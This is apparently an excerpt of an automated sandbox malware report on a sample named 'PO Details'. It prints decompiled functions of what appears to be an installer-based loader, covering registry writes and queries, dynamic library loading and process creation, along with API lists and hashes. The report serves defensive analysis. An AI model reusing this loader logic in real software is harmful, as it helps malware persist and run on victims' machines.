				void* _t76;

				_t76 = __esi;
				_t68 = __edi;
				_t67 = __edx;
				 *0x6e49506c = _a8;
				 *0x6e495070 = _a16;
				 *0x6e495074 = _a12;
				 *((intOrPtr*)(_a20 + 0xc))( *0x6e495048, E6E4915B1);
				_push(1); // executed
				_t37 = E6E491B5F(); // executed
				_t54 = _t37;
				if(_t54 == 0) {
					L28:
					return _t37;
				} else {
					if( *((intOrPtr*)(_t54 + 4)) != 1) {
						E6E49239E(_t54);
					}
					_push(_t54);
					E6E4923E0(_t67);
					_t57 =  *((intOrPtr*)(_t54 + 4));
					if(_t57 == 0xffffffff) {
						L14:
						if(( *(_t54 + 0x1010) & 0x00000004) == 0) {
							if( *((intOrPtr*)(_t54 + 4)) == 0) {
								_push(_t54);
								_t37 = E6E4925B5();
							} else {
								_push(_t76);
								_push(_t68);
								_t61 = 8;
								_t13 = _t54 + 0x1018; // 0x1018
								memcpy( &_v36, _t13, _t61 << 2);
								_t42 = E6E4915C6(_t54,  &_v136);
								 *(_t54 + 0x1034) =  *(_t54 + 0x1034) & 0x00000000;
								_t18 = _t54 + 0x1018; // 0x1018
								_t72 = _t18;
								_push(_t54);
								 *((intOrPtr*)(_t54 + 0x1020)) = _t42;
								 *_t72 = 4;
								E6E4925B5();
								_t63 = 8;
								_t37 = memcpy(_t72,  &_v36, _t63 << 2);
							}
						} else {
							_push(_t54);
							E6E4925B5();
							_t37 = GlobalFree(E6E491272(E6E4915B4(_t54)));
						}
						if( *((intOrPtr*)(_t54 + 4)) != 1) {
							_t37 = E6E492578(_t54);
							if(( *(_t54 + 0x1010) & 0x00000040) != 0 &&  *_t54 == 1) {
								_t37 =  *(_t54 + 0x1008);
								if(_t37 != 0) {
									_t37 = FreeLibrary(_t37);
								}
							}
							if(( *(_t54 + 0x1010) & 0x00000020) != 0) {
								_t37 = E6E49153D( *0x6e495068);
							}
						}
						if(( *(_t54 + 0x1010) & 0x00000002) != 0) {
							goto L28;
						} else {
							return GlobalFree(_t54);
						}
					}
					_t48 =  *_t54;
					if(_t48 == 0) {
						if(_t57 != 1) {
							goto L14;
						}
						E6E492D83(_t54);
						L12:
						_t54 = _t48;
						L13:
						goto L14;
					}
					_t49 = _t48 - 1;
					if(_t49 == 0) {
						L8:
						_t48 = E6E492AF8(_t54); // executed
						goto L12;
					}
					_t50 = _t49 - 1;
					if(_t50 == 0) {
						E6E492770(_t54);
						goto L13;
					}
					if(_t50 != 1) {
						goto L14;
					}
					goto L8;
				}
			}

0x6e491777
0x6e491777
0x6e491777
0x6e491784
0x6e49178c
0x6e491799
0x6e4917a7
0x6e4917aa
0x6e4917ac
0x6e4917b1
0x6e4917b6
0x6e4918d8
0x6e4918d8
0x6e4917bc
0x6e4917c0
0x6e4917c3
0x6e4917c8
0x6e4917c9
0x6e4917ca
0x6e4917d0
0x6e4917d6
0x6e491806
0x6e49180d
0x6e491831
0x6e49187e
0x6e49187f
0x6e491833
0x6e491833
0x6e491834
0x6e49183d
0x6e49183e
0x6e491848
0x6e49184b
0x6e491850
0x6e491857
0x6e491857
0x6e49185d
0x6e49185e
0x6e491864
0x6e49186a
0x6e491877
0x6e491878
0x6e49187b
0x6e49180f
0x6e49180f
0x6e491810
0x6e491825
0x6e491825
0x6e491889
0x6e49188c
0x6e491899
0x6e4918a0
0x6e4918a8
0x6e4918ab
0x6e4918ab
0x6e4918a8
0x6e4918b8
0x6e4918c0
0x6e4918c5
0x6e4918b8
0x6e4918cd
0x00000000
0x6e4918cf
0x00000000
0x6e4918d0
0x6e4918cd
0x6e4917da
0x6e4917dd
0x6e4917fb
0x00000000
0x00000000
0x6e4917fe
0x6e491803
0x6e491803
0x6e491805
0x00000000
0x6e491805
0x6e4917df
0x6e4917e0
0x6e4917e8
0x6e4917e9
0x00000000
0x6e4917e9
0x6e4917e2
0x6e4917e3
0x6e4917f1
0x00000000
0x6e4917f1
0x6e4917e6
0x00000000
0x00000000
0x00000000
0x6e4917e6

APIs

Part of subcall function 6E491B5F: GlobalFree.KERNEL32(?), ref: 6E491DD4
Part of subcall function 6E491B5F: GlobalFree.KERNEL32(?), ref: 6E491DD9
Part of subcall function 6E491B5F: GlobalFree.KERNEL32(?), ref: 6E491DDE

GlobalFree.KERNEL32(00000000), ref: 6E491825
FreeLibrary.KERNEL32(?), ref: 6E4918AB
GlobalFree.KERNEL32(00000000), ref: 6E4918D0

Part of subcall function 6E49239E: GlobalAlloc.KERNEL32(00000040,?), ref: 6E4923CF

Part of subcall function 6E492770: GlobalAlloc.KERNEL32(00000040,00000000,?,?,00000000,?,?,?,6E4917F6,00000000), ref: 6E492840

Part of subcall function 6E4915C6: wsprintfW.USER32 ref: 6E4915F4

Strings

, xrefs: 6E4918B1

Memory Dump Source

Source File: 00000001.00000002.9314657277.000000006E491000.00000020.00000001.01000000.00000004.sdmp, Offset: 6E490000, based on PE: true

Associated: 00000001.00000002.9314566108.000000006E490000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.9314713092.000000006E494000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.9314753504.000000006E496000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6e490000_PO Details.jbxd

Similarity

API ID: Global$Free$Alloc$Librarywsprintf
String ID:
API String ID: 3962662361-3916222277
Opcode ID: f037edef1e3c64bbd00f9f14fc797cef6a7d1d0a77a7fb94d316faf44f37e9ae
Instruction ID: e4bfce1972d2156e2c22450a5039f03a8beeab7c4e49e1398d518d56f9899dbf
Opcode Fuzzy Hash: f037edef1e3c64bbd00f9f14fc797cef6a7d1d0a77a7fb94d316faf44f37e9ae
Instruction Fuzzy Hash: BA41C3B18002459ADF10DFF4A884FD53FACBB05355F1505ABE915BA386DBB8804CF7A0

Uniqueness

Uniqueness Score: -1.00%

Function 00402482 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 64
registrystringCOMMON

Download Yara Rule

C-Code - Quality: 83%

			E00402482(void* __eax, int __ebx, intOrPtr __edx, void* __eflags) {
				void* _t20;
				void* _t21;
				int _t24;
				long _t25;
				int _t30;
				intOrPtr _t33;
				void* _t34;
				intOrPtr _t37;
				void* _t39;
				void* _t42;

				_t42 = __eflags;
				_t33 = __edx;
				_t30 = __ebx;
				_t37 =  *((intOrPtr*)(_t39 - 0x20));
				_t34 = __eax;
				 *(_t39 - 0x10) =  *(_t39 - 0x1c);
				 *(_t39 - 0x44) = E00402D3E(2);
				_t20 = E00402D3E(0x11);
				 *(_t39 - 4) = 1;
				_t21 = E00402DCE(_t42, _t34, _t20, 2); // executed
				 *(_t39 + 8) = _t21;
				if(_t21 != __ebx) {
					_t24 = 0;
					if(_t37 == 1) {
						E00402D3E(0x23);
						_t24 = lstrlenW(0x40b5f0) + _t29 + 2;
					}
					if(_t37 == 4) {
						 *0x40b5f0 = E00402D1C(3);
						 *((intOrPtr*)(_t39 - 0x38)) = _t33;
						_t24 = _t37;
					}
					if(_t37 == 3) {
						_t24 = E0040324C( *((intOrPtr*)(_t39 - 0x24)), _t30, 0x40b5f0, 0x1800);
					}
					_t25 = RegSetValueExW( *(_t39 + 8),  *(_t39 - 0x44), _t30,  *(_t39 - 0x10), 0x40b5f0, _t24); // executed
					if(_t25 == 0) {
						 *(_t39 - 4) = _t30;
					}
					_push( *(_t39 + 8));
					RegCloseKey();
				}
				 *0x434fa8 =  *0x434fa8 +  *(_t39 - 4);
				return 0;
			}

0x00402482
0x00402482
0x00402482
0x00402482
0x00402485
0x0040248c
0x00402496
0x00402499
0x004024a2
0x004024a9
0x004024b0
0x004024b3
0x004024b9
0x004024c3
0x004024c7
0x004024d2
0x004024d2
0x004024d9
0x004024e3
0x004024e9
0x004024ec
0x004024ec
0x004024f0
0x004024fc
0x004024fc
0x0040250d
0x00402515
0x00402517
0x00402517
0x0040251a
0x004025f5
0x004025f5
0x00402bc5
0x00402bd1

APIs

lstrlenW.KERNEL32(C:\Users\user\AppData\Local\Temp\nsm89AB.tmp,00000023,00000011,00000002), ref: 004024CD
RegSetValueExW.KERNELBASE(?,?,?,?,C:\Users\user\AppData\Local\Temp\nsm89AB.tmp,00000000,00000011,00000002), ref: 0040250D
RegCloseKey.ADVAPI32(?,?,?,C:\Users\user\AppData\Local\Temp\nsm89AB.tmp,00000000,00000011,00000002), ref: 004025F5

Strings

C:\Users\user\AppData\Local\Temp\nsm89AB.tmp, xrefs: 004024BE, 004024CC, 004024E3, 004024F7, 00402502

Memory Dump Source

Source File: 00000001.00000002.9296505845.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.9296454667.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.9296594572.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.9296649258.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.9296907529.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.9296956494.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.9297023788.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.9297074741.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.9297168424.000000000046C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.9297228468.000000000046E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_PO Details.jbxd

Similarity

API ID: CloseValuelstrlen
String ID: C:\Users\user\AppData\Local\Temp\nsm89AB.tmp
API String ID: 2655323295-1510484101
Opcode ID: e949525387f2bbf957712f10692e3855dbe23a3db20d8a415a3f903535603d74
Instruction ID: 7edbd774ff12736b5c68cca40ff53a8b2e2340a941a441eef078c8e93cf21856
Opcode Fuzzy Hash: e949525387f2bbf957712f10692e3855dbe23a3db20d8a415a3f903535603d74
Instruction Fuzzy Hash: 1C11AF71E00108BEDB00AFA5CE49AAEBBB8EF44314F20443AF504B71D1D7B89D409A68

Uniqueness

Uniqueness Score: -1.00%

Function 004015C1 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 65
COMMON

Download Yara Rule

C-Code - Quality: 86%

			E004015C1(short __ebx, void* __eflags) {
				void* _t17;
				int _t23;
				void* _t25;
				signed char _t26;
				short _t28;
				short _t31;
				short* _t34;
				void* _t36;

				_t28 = __ebx;
				 *(_t36 + 8) = E00402D3E(0xfffffff0);
				_t17 = E00405D91(_t16);
				_t32 = _t17;
				if(_t17 != __ebx) {
					do {
						_t34 = E00405D13(_t32, 0x5c);
						_t31 =  *_t34;
						 *_t34 = _t28;
						if(_t31 != _t28) {
							L5:
							_t25 = E004059C5( *(_t36 + 8));
						} else {
							_t42 =  *((intOrPtr*)(_t36 - 0x28)) - _t28;
							if( *((intOrPtr*)(_t36 - 0x28)) == _t28 || E004059E2(_t42) == 0) {
								goto L5;
							} else {
								_t25 = E00405948( *(_t36 + 8)); // executed
							}
						}
						if(_t25 != _t28) {
							if(_t25 != 0xb7) {
								L9:
								 *((intOrPtr*)(_t36 - 4)) =  *((intOrPtr*)(_t36 - 4)) + 1;
							} else {
								_t26 = GetFileAttributesW( *(_t36 + 8)); // executed
								if((_t26 & 0x00000010) == 0) {
									goto L9;
								}
							}
						}
						 *_t34 = _t31;
						_t32 = _t34 + 2;
					} while (_t31 != _t28);
				}
				if( *((intOrPtr*)(_t36 - 0x2c)) == _t28) {
					_push(0xfffffff5);
					E00401423();
				} else {
					E00401423(0xffffffe6);
					E00406411(L"C:\\Users\\Arthur\\AppData\\Local\\Temp\\Susendes\\Scrumption\\Bilfragmenteringsanlgs209\\Buskmndene\\Injectors\\Cunts",  *(_t36 + 8));
					_t23 = SetCurrentDirectoryW( *(_t36 + 8)); // executed
					if(_t23 == 0) {
						 *((intOrPtr*)(_t36 - 4)) =  *((intOrPtr*)(_t36 - 4)) + 1;
					}
				}
				 *0x434fa8 =  *0x434fa8 +  *((intOrPtr*)(_t36 - 4));
				return 0;
			}

0x004015c1
0x004015c9
0x004015cc
0x004015d1
0x004015d5
0x004015d7
0x004015df
0x004015e1
0x004015e4
0x004015ea
0x00401604
0x00401607
0x004015ec
0x004015ec
0x004015ef
0x00000000
0x004015fa
0x004015fd
0x004015fd
0x004015ef
0x0040160e
0x00401615
0x00401624
0x00401624
0x00401617
0x0040161a
0x00401622
0x00000000
0x00000000
0x00401622
0x00401615
0x00401627
0x0040162b
0x0040162c
0x004015d7
0x00401634
0x00401663
0x004022e9
0x00401636
0x00401638
0x00401645
0x0040164d
0x00401655
0x0040165b
0x0040165b
0x00401655
0x00402bc5
0x00402bd1

APIs

Part of subcall function 00405D91: CharNextW.USER32(?,?,0042FA70,?,00405E05,0042FA70,0042FA70, 4iv,?,C:\Users\user\AppData\Local\Temp\,00405B43,?,76693420,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405D9F
Part of subcall function 00405D91: CharNextW.USER32(00000000), ref: 00405DA4
Part of subcall function 00405D91: CharNextW.USER32(00000000), ref: 00405DBC

GetFileAttributesW.KERNELBASE(?,?,00000000,0000005C,00000000,000000F0), ref: 0040161A

Part of subcall function 00405948: CreateDirectoryW.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\), ref: 0040598B

SetCurrentDirectoryW.KERNELBASE(?,C:\Users\user\AppData\Local\Temp\Susendes\Scrumption\Bilfragmenteringsanlgs209\Buskmndene\Injectors\Cunts,?,00000000,000000F0), ref: 0040164D

Strings

C:\Users\user\AppData\Local\Temp\Susendes\Scrumption\Bilfragmenteringsanlgs209\Buskmndene\Injectors\Cunts, xrefs: 00401640

Memory Dump Source

Source File: 00000001.00000002.9296505845.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.9296454667.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.9296594572.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.9296649258.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.9296907529.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.9296956494.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.9297023788.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.9297074741.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.9297168424.000000000046C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.9297228468.000000000046E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_PO Details.jbxd

Similarity

API ID: CharNext$Directory$AttributesCreateCurrentFile
String ID: C:\Users\user\AppData\Local\Temp\Susendes\Scrumption\Bilfragmenteringsanlgs209\Buskmndene\Injectors\Cunts
API String ID: 1892508949-3700850040
Opcode ID: b8ced0bbdff828fada69f254c36b3a2cde61058eacd7c981d6ee30a213b234d1
Instruction ID: d42e9ae115e382ed64a017e661d14a8570f8e1ce7a364987760287960e16c3b9
Opcode Fuzzy Hash: b8ced0bbdff828fada69f254c36b3a2cde61058eacd7c981d6ee30a213b234d1
Instruction Fuzzy Hash: B411DD31504110EBCF206FA5CD4199F3BB0EF25369B28493BEA51B22F1DA3E49819A5E

Uniqueness

Uniqueness Score: -1.00%

Function 004059FA Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 24
processCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E004059FA(WCHAR* _a4) {
				struct _PROCESS_INFORMATION _v20;
				int _t7;

				0x430270->cb = 0x44;
				_t7 = CreateProcessW(0, _a4, 0, 0, 0, 0x4000000, 0, 0, 0x430270,  &_v20); // executed
				if(_t7 != 0) {
					CloseHandle(_v20.hThread);
					return _v20.hProcess;
				}
				return _t7;
			}

0x00405a03
0x00405a23
0x00405a2b
0x00405a30
0x00000000
0x00405a36
0x00405a3a

APIs

CreateProcessW.KERNELBASE(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,00430270,Error launching installer), ref: 00405A23
CloseHandle.KERNEL32(?), ref: 00405A30

Strings

Error launching installer, xrefs: 00405A0D

Memory Dump Source

Source File: 00000001.00000002.9296505845.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.9296454667.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.9296594572.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.9296649258.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.9296907529.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.9296956494.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.9297023788.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.9297074741.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.9297168424.000000000046C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.9297228468.000000000046E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_PO Details.jbxd

Similarity

API ID: CloseCreateHandleProcess
String ID: Error launching installer
API String ID: 3712363035-66219284
Opcode ID: 4cad7792158b69fc064c933527736888f22fedd2346a68a48c9e5725d4d2403f
Instruction ID: 9b609aa4dbda1b40da6c9694c56aee9f908f129f2491f8ac19b90d9f5f8e4f4b
Opcode Fuzzy Hash: 4cad7792158b69fc064c933527736888f22fedd2346a68a48c9e5725d4d2403f
Instruction Fuzzy Hash: 19E0B6B4600209BFEB109FA4EE49F7B7AACEB04708F004565BD50F6191DBB8EC158A7C

Uniqueness

Uniqueness Score: -1.00%

Function 004020D0 Relevance: 4.6, APIs: 3, Instructions: 73
libraryCOMMON

Download Yara Rule

C-Code - Quality: 60%

			E004020D0(void* __ebx, void* __eflags) {
				struct HINSTANCE__* _t23;
				struct HINSTANCE__* _t31;
				void* _t32;
				WCHAR* _t35;
				intOrPtr* _t36;
				void* _t37;
				void* _t39;

				_t32 = __ebx;
				asm("sbb eax, 0x434fd8");
				 *(_t39 - 4) = 1;
				if(__eflags < 0) {
					_push(0xffffffe7);
					L15:
					E00401423();
					L16:
					 *0x434fa8 =  *0x434fa8 +  *(_t39 - 4);
					return 0;
				}
				_t35 = E00402D3E(0xfffffff0);
				 *((intOrPtr*)(_t39 - 0x44)) = E00402D3E(1);
				if( *((intOrPtr*)(_t39 - 0x20)) == __ebx) {
					L3:
					_t23 = LoadLibraryExW(_t35, _t32, 8); // executed
					_t47 = _t23 - _t32;
					 *(_t39 + 8) = _t23;
					if(_t23 == _t32) {
						_push(0xfffffff6);
						goto L15;
					}
					L4:
					_t36 = E00406875(_t47,  *(_t39 + 8),  *((intOrPtr*)(_t39 - 0x44)));
					if(_t36 == _t32) {
						E00405479(0xfffffff7,  *((intOrPtr*)(_t39 - 0x44)));
					} else {
						 *(_t39 - 4) = _t32;
						if( *((intOrPtr*)(_t39 - 0x28)) == _t32) {
							 *_t36( *((intOrPtr*)(_t39 - 8)), 0x400, _t37, 0x40ce50, 0x40a000); // executed
						} else {
							E00401423( *((intOrPtr*)(_t39 - 0x28)));
							if( *_t36() != 0) {
								 *(_t39 - 4) = 1;
							}
						}
					}
					if( *((intOrPtr*)(_t39 - 0x24)) == _t32 && E00403A80( *(_t39 + 8)) != 0) {
						FreeLibrary( *(_t39 + 8));
					}
					goto L16;
				}
				_t31 = GetModuleHandleW(_t35); // executed
				 *(_t39 + 8) = _t31;
				if(_t31 != __ebx) {
					goto L4;
				}
				goto L3;
			}

0x004020d0
0x004020d0
0x004020d5
0x004020dc
0x0040219b
0x004022e9
0x004022e9
0x00402bc2
0x00402bc5
0x00402bd1
0x00402bd1
0x004020eb
0x004020f5
0x004020f8
0x00402108
0x0040210c
0x00402112
0x00402114
0x00402117
0x00402194
0x00000000
0x00402194
0x00402119
0x00402124
0x00402128
0x00402168
0x0040212a
0x0040212d
0x00402130
0x0040215c
0x00402132
0x00402135
0x0040213e
0x00402140
0x00402140
0x0040213e
0x00402130
0x00402170
0x00402189
0x00402189
0x00000000
0x00402170
0x004020fb
0x00402103
0x00402106
0x00000000
0x00000000
0x00000000

APIs

GetModuleHandleW.KERNELBASE(00000000,00000001,000000F0), ref: 004020FB

Part of subcall function 00405479: lstrlenW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsm89AB.tmp\System.dll,00000000,00425A20,766923A0,?,?,?,?,?,?,?,?,?,004033B0,00000000,?), ref: 004054B1
Part of subcall function 00405479: lstrlenW.KERNEL32(004033B0,Skipped: C:\Users\user\AppData\Local\Temp\nsm89AB.tmp\System.dll,00000000,00425A20,766923A0,?,?,?,?,?,?,?,?,?,004033B0,00000000), ref: 004054C1
Part of subcall function 00405479: lstrcatW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsm89AB.tmp\System.dll,004033B0), ref: 004054D4
Part of subcall function 00405479: SetWindowTextW.USER32(Skipped: C:\Users\user\AppData\Local\Temp\nsm89AB.tmp\System.dll,Skipped: C:\Users\user\AppData\Local\Temp\nsm89AB.tmp\System.dll), ref: 004054E6
Part of subcall function 00405479: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0040550C
Part of subcall function 00405479: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405526
Part of subcall function 00405479: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405534

LoadLibraryExW.KERNELBASE(00000000,?,00000008,00000001,000000F0), ref: 0040210C
FreeLibrary.KERNEL32(?,?,000000F7,?,?,00000008,00000001,000000F0), ref: 00402189

Memory Dump Source

Source File: 00000001.00000002.9296505845.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.9296454667.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.9296594572.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.9296649258.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.9296907529.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.9296956494.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.9297023788.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.9297074741.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.9297168424.000000000046C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.9297228468.000000000046E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_PO Details.jbxd

Similarity

API ID: MessageSend$Librarylstrlen$FreeHandleLoadModuleTextWindowlstrcat
String ID:
API String ID: 334405425-0
Opcode ID: 2a06d31b931b49bf2f8db5931c22a0a40424257b118d3c815d54da95721802d9
Instruction ID: ec066b6349dd7fa10fed5d852794e64c7c96c86c32cb5d354c2886168094fa20
Opcode Fuzzy Hash: 2a06d31b931b49bf2f8db5931c22a0a40424257b118d3c815d54da95721802d9
Instruction Fuzzy Hash: A7219931500104EBCF10AFA5CE49A9E7A71AF44354F34413BF515B51E0CBBD9D829A1D

Uniqueness

Uniqueness Score: -1.00%

Function 00402596 Relevance: 4.5, APIs: 3, Instructions: 47
registryCOMMON

Download Yara Rule

C-Code - Quality: 86%

			E00402596(int* __ebx, intOrPtr __edx, short* __edi) {
				void* _t9;
				int _t10;
				long _t13;
				int* _t16;
				intOrPtr _t21;
				short* _t22;
				void* _t24;
				void* _t26;
				void* _t29;

				_t22 = __edi;
				_t21 = __edx;
				_t16 = __ebx;
				_t9 = E00402D7E(_t29, 0x20019); // executed
				_t24 = _t9;
				_t10 = E00402D1C(3);
				 *((intOrPtr*)(_t26 - 0x10)) = _t21;
				 *__edi = __ebx;
				if(_t24 == __ebx) {
					 *((intOrPtr*)(_t26 - 4)) = 1;
				} else {
					 *(_t26 + 8) = 0x3ff;
					if( *((intOrPtr*)(_t26 - 0x20)) == __ebx) {
						_t13 = RegEnumValueW(_t24, _t10, __edi, _t26 + 8, __ebx, __ebx, __ebx, __ebx); // executed
						__eflags = _t13;
						if(_t13 != 0) {
							 *((intOrPtr*)(_t26 - 4)) = 1;
						}
					} else {
						RegEnumKeyW(_t24, _t10, __edi, 0x3ff);
					}
					_t22[0x3ff] = _t16;
					_push(_t24);
					RegCloseKey();
				}
				 *0x434fa8 =  *0x434fa8 +  *((intOrPtr*)(_t26 - 4));
				return 0;
			}

0x00402596
0x00402596
0x00402596
0x0040259b
0x004025a2
0x004025a4
0x004025ac
0x004025af
0x004025b2
0x00402925
0x004025b8
0x004025c0
0x004025c3
0x004025dc
0x004025e2
0x004025e4
0x004025e6
0x004025e6
0x004025c5
0x004025c9
0x004025c9
0x004025ed
0x004025f4
0x004025f5
0x004025f5
0x00402bc5
0x00402bd1

APIs

RegEnumKeyW.ADVAPI32(00000000,00000000,?,000003FF), ref: 004025C9
RegEnumValueW.KERNELBASE(00000000,00000000,?,?), ref: 004025DC
RegCloseKey.ADVAPI32(?,?,?,C:\Users\user\AppData\Local\Temp\nsm89AB.tmp,00000000,00000011,00000002), ref: 004025F5

Memory Dump Source

Source File: 00000001.00000002.9296505845.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.9296454667.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.9296594572.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.9296649258.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.9296907529.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.9296956494.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.9297023788.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.9297074741.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.9297168424.000000000046C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.9297228468.000000000046E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_PO Details.jbxd

Similarity

API ID: Enum$CloseValue
String ID:
API String ID: 397863658-0
Opcode ID: 693b4b7c162b2071d808d1ccb663ddef88a55d9f63883adb613dff133cf19400
Instruction ID: a8e4f27cd85b524b938bc80bb312ff0c07efa3365ef466736b2b8963d993c2c8
Opcode Fuzzy Hash: 693b4b7c162b2071d808d1ccb663ddef88a55d9f63883adb613dff133cf19400
Instruction Fuzzy Hash: 92017C71A11504BBEB149FA49E48AAFB77CEF40348F10403AF501B61C0D7B85E40866D

Uniqueness

Uniqueness Score: -1.00%

Function 02A83E50 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 78COMMON

Download Yara Rule

APIs

EnumWindows.USER32(?,?,00000092), ref: 02A83E91

Strings

B, xrefs: 02A83DF0

Memory Dump Source

Source File: 00000001.00000002.9298818143.0000000002A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 02A80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2a80000_PO Details.jbxd

Yara matches

Similarity

API ID: EnumWindows
String ID: B
API String ID: 1129996299-1255198513
Opcode ID: 4507e6db1203bd3e2c1129ca991713009a5f83f1b906db8a5e706dd1356457e0
Instruction ID: 0c8837384927b50c8ef5261e9179acc3e925183571d144a9b194da9c93e4a5cf
Opcode Fuzzy Hash: 4507e6db1203bd3e2c1129ca991713009a5f83f1b906db8a5e706dd1356457e0
Instruction Fuzzy Hash: 3921883214C1C5AECB21DF24CC086D9BFB1AF83654F18468ED5944B192CBB46615CB81

Uniqueness

Uniqueness Score: -1.00%

Function 00402522 Relevance: 3.1, APIs: 2, Instructions: 56
registryCOMMON

Download Yara Rule

C-Code - Quality: 84%

			E00402522(int* __ebx, char* __edi) {
				void* _t17;
				short* _t18;
				void* _t35;
				void* _t37;
				void* _t40;

				_t33 = __edi;
				_t27 = __ebx;
				_t17 = E00402D7E(_t40, 0x20019); // executed
				_t35 = _t17;
				_t18 = E00402D3E(0x33);
				 *__edi = __ebx;
				if(_t35 == __ebx) {
					 *(_t37 - 4) = 1;
				} else {
					 *(_t37 - 0x10) = 0x800;
					if(RegQueryValueExW(_t35, _t18, __ebx, _t37 + 8, __edi, _t37 - 0x10) != 0) {
						L7:
						 *_t33 = _t27;
						 *(_t37 - 4) = 1;
					} else {
						if( *(_t37 + 8) == 4) {
							__eflags =  *(_t37 - 0x20) - __ebx;
							 *(_t37 - 4) = 0 |  *(_t37 - 0x20) == __ebx;
							E00406358(__edi,  *__edi);
						} else {
							if( *(_t37 + 8) == 1 ||  *(_t37 + 8) == 2) {
								 *(_t37 - 4) =  *(_t37 - 0x20);
								_t33[0x7fe] = _t27;
							} else {
								goto L7;
							}
						}
					}
					_push(_t35);
					RegCloseKey();
				}
				 *0x434fa8 =  *0x434fa8 +  *(_t37 - 4);
				return 0;
			}

0x00402522
0x00402522
0x00402527
0x0040252e
